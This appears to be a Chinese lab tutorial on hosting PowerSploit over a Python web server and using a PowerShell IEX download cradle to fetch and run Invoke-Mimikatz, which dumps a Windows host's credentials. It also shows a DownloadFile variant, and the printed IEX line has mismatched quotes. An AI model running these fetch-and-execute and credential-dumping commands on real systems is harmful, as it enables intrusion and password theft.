powershell 脚本站点的搭建
一, Powersploit
Powersploit 是一款基于 powershell 的后渗透 (Post-Exploitation) 框架, 集成大量渗透相关模块和功能.
下载 powersploit
GitHub 地址: https://github.com/mattifestation/PowerSploit
二, 搭建站点(这里用 python 自带的 web 服务, 也可以用 phpstudy 等搭建站点)
1. 实验环境:
服务端: win7(python3.7)
客户端: Windows server 2008
客户端有 python 环境(用 python 的 Web 服务), 确保客户端能连通服务端
2. 实验步骤:
服务端:(win7)
1. 把下载好的 powersploit, 解压
2. 安装 python,cd 到 PowerSploit-master 目录里面, 并开启 Web 服务
python -m http.server 80 #python3.7
3. 本地测试 python 的 Web 服务是否开启
客户端:(Windows server2008)
客户端测试:
可以看到通过客户端的浏览器访问到搭建的站点了
下面开始进行 powersploit 内网渗透神器其中的 Invoke-Mimikatz.ps1 脚本文件进行举例
在客户端加载服务端脚本并执行(IEX 远程下载脚本执行)
powershell 加载 iex(New-Object.NET.WebClient).DownloadString('http://192.168.10.4/Exfiltration/Invoke-Mimikatz.ps1")
执行: Invoke-Mimikatz -DumpCreds
效果图如下:
从上图可以看到已经获取到本机(Windows server2008 的用户名和密码)
Tips: 还有一种可以直接把脚本文件下载下来的方式
- $client=new-object System.NET.WebClient
- $client.DownloadFile('http://192.168.8.135/Exfiltration/Invoke-Mimikatz.ps1','C://Mimikatz.ps1')
也可以直接运行脚本文件来进行内网攻击, 但这种方式并不推荐, 因为系统出于安全考虑
powershell 默认是不能执行本机上的. ps1 文件的, 这是因为 ps 有默认的安全限制
来源: https://www.cnblogs.com/yuzly/p/10428647.html